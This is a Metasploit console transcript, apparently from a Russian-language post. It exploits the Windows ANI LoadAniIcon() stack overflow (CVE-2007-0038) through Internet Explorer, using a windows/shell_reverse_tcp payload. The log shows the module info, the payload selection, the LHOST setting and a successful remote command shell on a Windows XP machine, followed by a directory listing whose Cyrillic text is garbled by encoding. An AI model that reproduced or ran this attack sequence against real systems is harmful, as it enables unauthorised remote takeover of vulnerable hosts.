use windows/browser/ani_loadimage_chunksize

>> info windows/browser/ani_loadimage_chunksize


Name: Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP)
Version: 4795
Platform: Windows
Privileged: No
License: Metasploit Framework License

Provided by:
hdm <hdm@metasploit.com>
skape <mmiller@hick.org>

Available targets:
Id Name
-- ----
0 Automatic
1 Windows XP SP2 user32.dll 5.1.2600.2622
2 Windows XP SP2 userenv.dll English
3 Windows XP SP2 userenv.dll French
4 Windows XP SP0/SP1 netui2.dll English
5 Windows 2000 SP0-SP4 netui2.dll English
6 Windows Vista user32.dll 6.0.6000.16386
7 Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language
8 Windows XP SP2 userenv.dll English
9 Windows XP SP2 user32.dll (5.1.2600.2180) English
10 Windows XP SP2 userenv.dll Portuguese (Brazil)
11 Windows XP SP1a userenv.dll English
12 Windows XP SP1a shell32.dll English

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 192.168.1.33 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
URIPATH no The URI to use for this exploit (default is random)

Payload information:
Space: 1234

Description:
This module exploits a buffer overflow vulnerability in the
LoadAniIcon() function of USER32.dll. The flaw is triggered through
Internet Explorer (6 and 7) by using the CURSOR style sheet
directive to load a malicious .ANI file. Internet Explorer will
catch any exceptions that occur while the invalid cursor is loaded,
causing the exploit to silently fail when the wrong target has been
chosen. This module will be updated in the near future to perform
client-side fingerprinting and brute forcing. This vulnerability was
discovered by Alexander Sotirov of Determina and was rediscovered,
in the wild, by McAfee.

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2007-0038
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2007-1765
http://www.securityfocus.com/bid/23194
http://www.microsoft.com/technet/security/advisory/935423.mspx
http://www.determina.com/security_center/security_advisories/securityadvisory_0day_032907.asp
http://www.determina.com/security.research/vulnerabilities/ani-header.html


>> set URIPATH test

URIPATH => test

>> show payloads


Compatible payloads
===================

Name Description
---- -----------
generic/shell_bind_tcp Generic Command Shell, Bind TCP Inline
----------- тут другие начинки, пропущены -------------
windows/shell_reverse_tcp Windows Command Shell, Reverse TCP Inline
----------- тут другие начинки, пропущены -------------

>> set PAYLOAD windows/shell_reverse_tcp

PAYLOAD => windows/shell_reverse_tcp

>> set LHOST 192.168.1.33

LHOST => 192.168.1.33

>> exploit
[*] Started reverse handler
[*] Using URL: http://192.168.1.33:8080/test
[*] Server started.
[*] Exploit running as background job.
[*] Command shell session 1 opened

(192.168.1.33:4444 -> 192.168.1.33:3402)

>> sessions -l


Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.1.33:4444 -> 192.168.1.33:3402


>> sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [‚¥àá¨ï 5.1.2600]

(‘) Š®à¯®à æ¨ï Œ ©ªà®á®äâ, 1985-2001.

D:\Documents and Settings\Admin>

>> dir

dir
’®¬ ¢ ãáâனá⢥ D ¨¬¥¥â ¬¥âªã WIN_XP_SP2

‘¥à¨©ë© ®¬¥à ⮬ : 455F-C2C7
‘®¤¥à¦¨¬®¥ ¯ ¯ª¨ D:\Documents and Settings\Admin

04.12.2006 19:49 <DIR> .
04.12.2006 19:49 <DIR> ..
04.12.2006 19:32 <DIR> ƒ« ¢®¥ ¬¥î
04.12.2006 19:49 <DIR> Œ®¨ ¤®ªã¬¥âë
04.12.2006 19:49 <DIR> ˆ§¡à ®¥
04.12.2006 19:32 <DIR> � ¡®ç¨© á⮫
10.12.2006 19:33 15 .bash_history
11.12.2006 00:23 44 %1
03.02.2007 18:56 <DIR> WINDOWS
30.04.2007 11:11 <DIR> .msf3

3 ä ©«®¢ 100ÿ653 ¡ ©â

9 ¯ ¯®ª 663ÿ971ÿ840 ¡ ©â ᢮¡®¤®

D:\Documents and Settings\Admin>